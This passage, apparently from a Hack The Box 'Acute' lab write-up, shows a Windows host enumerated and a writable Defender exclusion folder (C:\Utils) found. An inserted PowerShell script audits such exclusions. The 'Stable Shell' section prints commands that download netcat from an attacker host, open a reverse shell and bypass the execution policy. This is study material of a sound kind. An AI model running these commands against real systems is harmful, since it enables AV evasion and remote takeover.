AV ExclusionPath


After conducting a series of basic enumeration steps on the Acute-PC01 host, I found a non-default directory at the system root.

PS C:\> ls 
 
 
    Directory: C:\
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         12/7/2019   9:14 AM                PerfLogs                                                             
d-r---         12/6/2021  11:06 AM                Program Files                                                        
d-r---         12/7/2021  12:43 PM                Program Files (x86)                                                  
d-r---        12/21/2021  10:50 PM                Users                                                                
d-----         1/31/2022  12:29 AM                Utils                                                                
d-----        12/16/2021   1:23 AM                Windows          

It's the C:\Utils directory.

PS C:\> ls C:\Utils
PS C:\> ls -Force C:\Utils
 
 
    Directory: C:\Utils
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-h--        12/21/2021   6:41 PM            148 desktop.ini                                                          

While the C:\Utils directory seems empty at first, the desktop.ini file is revealed upon listing with the -Force flag. desktop.ini is a special configuration file in Windows used to customize the appearance and behavior of folders. It can specify settings like the folder's icon, its localized name, and an info tip. When present in a folder, desktop.ini controls how that folder is displayed and behaves within Windows File Explorer.

PS C:\> cat C:\Utils\desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender

The info tip suggests the directory is configured as a Defender ExclusionPath. This would mean that arbitrary binaries could be executed from this directory, as it is excluded from AV scanning.

PS C:\> icacls C:\Utils
 
C:\Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
         BUILTIN\Administrators:(OI)(CI)(F)
         ACUTE\edavies:(OI)(CI)(M)
         BUILTIN\Users:(OI)(CI)(R)
 
Successfully processed 1 files; Failed processing 0 files

Checking the directory permissions reveals that the current user (ACUTE\edavies, with Modify rights) is able to write to the C:\Utils directory.
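The combination found above (a Defender exclusion path that a non-privileged principal can write to) is something an administrator can audit directly. The following PowerShell audit is an added example, not part of this write-up; it assumes it is run elevated on the host being reviewed and uses the real Get-MpPreference and Get-Acl cmdlets. Any principal other than SYSTEM, Administrators and TrustedInstaller holding write/modify rights on an excluded folder is reported.

```powershell
# Added example (not from the write-up): audit Defender exclusion paths for
# write access by principals that are not expected to own system folders.
# Run as an administrator; Get-MpPreference needs elevated rights to list exclusions.

# Principals that are expected to have write access to system directories.
$trustedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)

# Any of these rights lets a caller drop or replace files in the folder.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl

function Test-WeakExclusionPath {
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Exists = $false; WritableBy = @() }
    }

    $acl = Get-Acl -LiteralPath $Path
    $writers = foreach ($ace in $acl.Access) {
        $who = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and
            ($trustedPrincipals -notcontains $who) -and
            (($ace.FileSystemRights -band $writeRights) -ne 0)) {
            $who
        }
    }
    [pscustomobject]@{
        Path       = $Path
        Exists     = $true
        WritableBy = @($writers | Sort-Object -Unique)
    }
}

# Enumerate every configured exclusion path and report the writable ones.
foreach ($p in (Get-MpPreference).ExclusionPath) {
    $r = Test-WeakExclusionPath -Path $p
    if ($r.WritableBy.Count -gt 0) {
        Write-Warning "Exclusion '$($r.Path)' is writable by: $($r.WritableBy -join ', ')"
    }
}
```

On the C:\Utils ACL shown above, the audit would flag ACUTE\edavies (Modify); the remediation is to tighten the folder ACL or drop the exclusion with Remove-MpPreference -ExclusionPath.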

Stable Shell


Since the console window of the PSWA session is rather limited, I will start another PowerShell session via Netcat, using the discovered exclusion path above.

PS C:\Utils> iwr -Uri 'http://10.10.16.8/nc64.exe' -OutFile C:\Utils\nc64.exe
PS C:\Utils> cmd /c nc64.exe 10.10.16.8 9999 -e powershell

Netcat is transferred over HTTP and used to invoke a reverse shell.

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 9999          
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49863
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Utils> PowerShell -ep bypass
PS C:\Utils

I will also bypass the Execution Policy. Leveraging this information, I will be able to run PEAS.